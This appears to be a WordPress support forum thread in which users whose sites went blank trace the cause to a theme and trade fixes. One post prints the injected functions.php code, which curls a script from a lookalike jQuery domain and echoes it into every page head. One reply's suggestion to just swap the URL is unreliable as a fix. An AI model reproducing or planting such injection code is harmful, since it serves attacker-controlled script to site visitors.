Thanks for bringing this to my attention. I’ll get those themes looked at, and either removed or fixed, ASAP.
@bmwhealon:
try to change this
$url = "http://www.jqueryc.com/jquery-1.6.3.min.js";
with this
$src = "http://ajax.googleapis.com/ajax/libs/jquery/1.6.3/jquery.min.js";
@zchristos:
I tried that and it didnt work. No matter what I do when click update file, I still get a blank screen. I am pretty much at a standstill as I cannot navigate anywhere else because any page associated with my site is now blank
Switch to the Twenty Eleven theme by renaming your current theme’s folder inside wp-content/themes and adding “-old” to the end of the folder name using FTP or whatever file management application your host provides. That will get your site back up and allow you back into your admin area. Do not re-activate your old theme. I’d suggest looking for another theme.
@jarrodcase you are a life saver! A SECOND of my sites went down today too, and if it was for that little bit of code I would be spending my evening re-doing the whole site. Thank you!
I had the same problem, and i solved it just removing the following lines from functions.php of my theme:
//SET THEME FUNCTIONS
//if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}